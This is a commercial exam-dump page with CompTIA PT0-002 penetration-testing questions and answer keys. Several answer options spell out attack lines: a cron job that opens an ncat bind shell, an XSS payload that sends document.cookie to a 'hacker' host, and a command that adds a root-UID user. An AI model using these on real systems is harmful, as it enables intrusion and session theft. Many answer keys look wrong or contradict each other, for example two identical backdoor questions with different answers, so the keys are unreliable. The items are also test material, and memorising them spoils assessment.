• Home
  • Blogs
  • Verified PT0-002 exam dumps Q&As with Correct 142 Questions and Answers [Q14-Q37]

Verified PT0-002 exam dumps Q&As with Correct 142 Questions and Answers [Q14-Q37]

Share

Verified PT0-002 exam dumps Q&As with Correct 142 Questions and Answers

CompTIA PT0-002 Test Engine PDF - All Free Dumps from Exam-Killer

NEW QUESTION 14
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option D
  • B. Option C
  • C. Option B
  • D. Option A

Answer: D

 

NEW QUESTION 15
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

  • A. Phishing
  • B. Shoulder surfing
  • C. Tailgating
  • D. Baiting

Answer: D

 

NEW QUESTION 16
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?

  • A. nmap -sA -sV --host-timeout 60 192.168.1.10
  • B. nmap -p0 -T0 -sS 192.168.1.10
  • C. nmap -A -n 192.168.1.10
  • D. nmap -f --badsum 192.168.1.10

Answer: A

 

NEW QUESTION 17
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. may reduce the true positive rate of findings.
  • B. may cause unintended failures in control systems.
  • C. will create a denial-of-service condition on the IP networks.
  • D. will reveal vulnerabilities in the Modbus protocol.

Answer: B

 

NEW QUESTION 18
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Create an encrypted tunnel.
  • D. Attempt to flood open ports.

Answer: A

 

NEW QUESTION 19
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Forensically acquire the backdoor Trojan and perform attribution
  • C. Utilize the backdoor in support of the engagement
  • D. Inform the customer immediately about the backdoor

Answer: A

 

NEW QUESTION 20
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

  • A. The tester did not run sudo before the command.
  • B. This URI returned a server error.
  • C. The web server is using HTTPS instead of HTTP.
  • D. The HTTP port is not open on the firewall.

Answer: D

 

NEW QUESTION 21
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

  • A. Nikto
  • B. OpenVAS
  • C. Nessus
  • D. SQLmap

Answer: D

 

NEW QUESTION 22
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Document the unprotected file repository as a finding in the penetration-testing report.
  • B. Recommend configuring password complexity rules in all the systems and applications.
  • C. Create a custom password dictionary as preparation for password spray testing.
  • D. Recommend using a password manage/vault instead of text files to store passwords securely.

Answer: A

 

NEW QUESTION 23
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nikto
  • D. Burp Suite
  • E. Nessus
  • F. Wireshark

Answer: B,F

 

NEW QUESTION 24
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Establish communication and escalation procedures with the client.
  • B. Verify the client has granted network access to the hot site.
  • C. Ensure the client has signed the SOW.
  • D. Determine if the failover environment relies on resources not owned by the client.

Answer: D

 

NEW QUESTION 25
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The rules of engagement from the assessment
  • B. The executive summary and information regarding the testing company
  • C. A quick description of the vulnerability and a high-level control to fix it
  • D. Information regarding the business impact if compromised

Answer: D

 

NEW QUESTION 26
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Inform the customer immediately about the backdoor
  • C. Forensically acquire the backdoor Trojan and perform attribution
  • D. Utilize the backdoor in support of the engagement

Answer: B

 

NEW QUESTION 27
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. A vulnerability scan
  • B. Port knocking
  • C. A ping sweep
  • D. An Nmap scan
  • E. Traffic sniffing
  • F. Open-source research

Answer: A,D

 

NEW QUESTION 28
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

  • A. nmap -sV 192.168.1.2/24 -PO
  • B. nmap -sT -vvv -O 192.168.1.2/24 -PO
  • C. nmap -sS -O 192.168.1.2/24 -T1
  • D. nmap -sA -v -O 192.168.1.2/24

Answer: C

 

NEW QUESTION 29
A compliance-based penetration test is primarily concerned with:

  • A. obtaining Pll from the protected network.
  • B. obtaining specific information from the protected network.
  • C. bypassing protection on edge devices.
  • D. determining the efficacy of a specific set of security standards.

Answer: D

 

NEW QUESTION 30
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

Answer: A

 

NEW QUESTION 31
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

  • A. sudo useradd -ou 0 -g 0 user
  • B. wmic startup get caption,command
  • C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
  • D. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

Answer: B

 

NEW QUESTION 32
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Web-application firewall
  • D. Output encoding
  • E. Base64 encoding
  • F. Input validation

Answer: B,F

 

NEW QUESTION 33
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the --script vulners option set against the target
  • B. Run nmap with the -sV and -p22 options set against the target
  • C. Run nmap with the -sA option set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Answer: C

 

NEW QUESTION 34
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

  • A. Shodan results
  • B. Externally facing open ports
  • C. IP addresses and subdomains
  • D. DNS forward and reverse lookups
  • E. Zone transfers
  • F. Internet search engines

Answer: C,E

 

NEW QUESTION 35
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:

Explanation
A picture containing shape Description automatically generated

A picture containing treemap chart Description automatically generated

Text Description automatically generated

Graphical user interface Description automatically generated

 

NEW QUESTION 36
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?

  • A. The client was not ready for the assessment to start
  • B. The penetration tester had incorrect contact information
  • C. The planning process failed to ensure all teams were notified
  • D. The penetration tester was testing the wrong assets

Answer: C

 

NEW QUESTION 37
......

100% Passing Guarantee - Brilliant PT0-002 Exam Questions PDF: https://www.exam-killer.com/PT0-002-valid-questions.html

Get New PT0-002 Certification – Valid Exam Dumps Questions: https://drive.google.com/open?id=1SeYgK1FyKJ11ctg8cBuQTAGeDQ-v3kbs

Related Blogs

more
CompTIA PT0-002 Certification Practice Exam

All we do is to help you pass the actual test with our training material. The most relevant questions together with verified answers can ensure you 100% pass.

Latest Update

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 EXAM-KILLER.COM. All rights reserved. All trademarks are the property of their respective owners and we don't provide actual questions from any vendor. Privacy Policy